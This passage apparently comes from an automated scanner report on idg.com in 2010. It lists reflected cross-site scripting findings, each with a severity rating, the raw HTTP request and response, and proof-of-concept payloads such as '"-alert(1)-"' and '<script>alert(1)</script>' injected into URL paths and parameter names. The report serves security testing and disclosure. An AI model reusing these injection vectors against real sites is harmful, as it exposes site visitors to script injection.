...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0");
} catch(err) {}</script>
...[SNIP]...

2.188. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45fad"%3b0d45e48607d was submitted in the REST URL parameter 1. This input was echoed as 45fad";0d45e48607d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www45fad"%3b0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www45fad";0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.189. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbe20"%3bcf8c8614847 was submitted in the REST URL parameter 3. This input was echoed as dbe20";cf8c8614847 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.jsdbe20"%3bcf8c8614847?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.jsdbe20";cf8c8614847?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.190. http://idg.com/www/homenew.nsf/ajaxroutine.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb80"-alert(1)-"77dede8c335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1");
} catch(err) {}</script>
...[SNIP]...

2.191. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72f0a"%3b5f984d36b94 was submitted in the REST URL parameter 1. This input was echoed as 72f0a";5f984d36b94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www72f0a"%3b5f984d36b94/homenew.nsf/awmlib2.js HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:47 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www72f0a";5f984d36b94/homenew.nsf/awmlib2.js");
} catch(err) {}</script>
...[SNIP]...

2.192. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8105e"%3baf69c63e062 was submitted in the REST URL parameter 3. This input was echoed as 8105e";af69c63e062 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/awmlib2.js8105e"%3baf69c63e062 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js8105e";af69c63e062");
} catch(err) {}</script>
...[SNIP]...

2.193. http://idg.com/www/homenew.nsf/awmlib2.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b033"-alert(1)-"ea5c4a653b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1");
} catch(err) {}</script>
...[SNIP]...

2.194. http://idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b2f"-alert(1)-"90698c058cf was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5043
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf");
} catch(err) {}</script>
...[SNIP]...

2.195. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c8e"%3b12e2645e466 was submitted in the REST URL parameter 1. This input was echoed as 75c8e";12e2645e466 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www75c8e"%3b12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www75c8e";12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.196. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6452c"%3b772900484ab was submitted in the REST URL parameter 3. This input was echoed as 6452c";772900484ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js6452c"%3b772900484ab?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js6452c";772900484ab?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.197. http://idg.com/www/homenew.nsf/core.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a779"-alert(1)-"d0b5380c266 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1");
} catch(err) {}</script>
...[SNIP]...

2.198. http://idg.com/www/homenew.nsf/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 848eb"%3b58421c6c63c was submitted in the REST URL parameter 1. This input was echoed as 848eb";58421c6c63c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www848eb"%3b58421c6c63c/homenew.nsf/home?readform HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www848eb";58421c6c63c/homenew.nsf/home?readform");
} catch(err) {}</script>
...[SNIP]...

2.199. http://idg.com/www/homenew.nsf/home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c700"%3b5ea31e5fe23 was submitted in the REST URL parameter 3. This input was echoed as 3c700";5ea31e5fe23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home3c700"%3b5ea31e5fe23?readform HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home3c700";5ea31e5fe23?readform");
} catch(err) {}</script>
...[SNIP]...

2.200. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc373"><script>alert(1)</script>63b78d5c0f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/homenew.nsf/home?readform&cc373"><script>alert(1)</script>63b78d5c0f5=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:21 GMT
Last-Modified: Thu, 16 Dec 2010 13:00:19 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html
Content-Length: 15450
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Home</titl
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&cc373"><script>alert(1)</script>63b78d5c0f5=1">
...[SNIP]...

2.201. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c1b"-alert(1)-"52c0a93e1d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1");
} catch(err) {}</script>
...[SNIP]...

2.202. http://idg.com/www/homenew.nsf/home [readform parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9917"-alert(1)-"f2355dde872 was submitted in the readform parameter. This input was echoed unmodified in the application's response.

